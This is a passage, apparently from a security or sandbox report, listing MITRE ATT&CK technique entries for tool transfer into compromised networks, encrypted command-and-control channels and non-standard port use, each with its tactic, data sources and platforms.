Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre